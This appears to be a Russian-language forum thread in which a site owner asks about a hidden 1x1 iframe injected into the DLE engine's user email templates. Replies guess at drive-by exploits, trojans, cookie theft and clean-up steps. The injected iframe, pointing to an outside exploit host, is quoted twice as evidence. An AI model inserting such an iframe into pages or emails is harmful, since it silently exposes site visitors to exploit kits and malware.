Здрасти) у меня на сайте была обнаружена вот такая строчка

<iframe src=\"http://zabywjwzlr.biz/dl/adv448.php\" width=1 height=1></iframe>

вставлена она была в формы с текстом отсылаемые юзерам при новом ПМ или о письме с \"Обратной связи\" ...

Какие последствия могут быть? И чего мог добиться хакер?

Спасибо)

знакомая строчка.
такая приписывалась с слоите RST помоему..для IPB 2.1.6..

CraZy I izzi, последствия мы можем только гадать. Скорее всего кража кукисов..

мдя)) не повезло мне))

что посоветуете делать? чтоб такого больше не произашло?

я конечно не специалист, но я не смог бы с помощью фрейма без явы спереть куки, а вот троянчик закачать через сплойт к ослу вполне возможно

нда, макс дело говорит...

что делать? Ну наверно сменить пароль на всякий пожарный. И забанить по Ip чела -)

эти меры уже приняты ..

может ещё что посаветуете? или где можно почитать инфу об этом?

https://forum.antichat.ru/showpost.php?p=175930&postcount=3
гм.. разные adv, но смысл тот же..
Молодец, правильно все делаешь.

ищи дырку както уж он вставил это---- а насчет последствий мож просто клики на вас зарабатывал =)

<iframe src=\"http://zabywjwzlr.biz/dl/adv448.php\" width=1 height=1></iframe>
Очень похоже на ссылку, которая ставится для юзания дыр ИЕ и установки тул-бара дополнительного, спайвэа и тд.... ИМХО, это она и есть...

а на будущее счобы не спрашивать что он мог сделать открой по сслыке скрипт-- без выполнения или слей его качалкой-- и позырь что он делает
Надо порсто весь сайт выкачивать, потом полазить по файлам и найти все пароли. Все настоящие хакеры так делают!!! ;)

dinar_007, прекрати флеймить..

ребят, вы хоть видели, что там даже сайта нет?

"Fedora Core Test Page"

Побоялись зайти?)

podkashey качалки выкачивают главную страницу и ищут там линки на страницы на этом же сервере и так \"парсят\" каждую.сомневаюсь что там будет линк на пароли и тому подобное
гыгы... это я к тому, что геном предложил скачать пхп файл... ;)))
А как качалки работают я знаю... сам телепортом давно еще выкачивал всякое разное...

Данный iframe на Сплоит где идёт подгрузка софта!

Мда .. но фишка в том что этот код был вписан в Админке в \"Формы для отправки писем с сайта\" ... движок ДЛЕ ... на сколько я знаю эти формы хранятся в базе ... и по-этому могу предположить что было проникновение в админку .... может я и не прав ... но всё же

Не юзал движок ДЛЕ. но если логически подумать..как сообщение могло оказаться в админке.. если никто туда не проникал? ы?
Скорее всего сделали рассылку с данной ссылкой..чтобы протроянить юзеров, зареганных на сайте. как вариант.. имхо. Судя из твоих слов.

а я не исключаю возможности проникновения в админку ..

был у меня случай .. форум Ipb взломали у меня .. мож тогда и было проникновение через форум в ДЛЕ ... но на сколько знаю ДЛЕ сам не сильно дырявый .. хотя .. дыры есть везде ИМХО

спроси логи у хостера за тот день когда взлом был.

ослинный сплоит :)

Redirection Status
The URL was redirected to . Please click the link to go there.

You can enable the automatic redirection in the settings.

Generated by Opera ©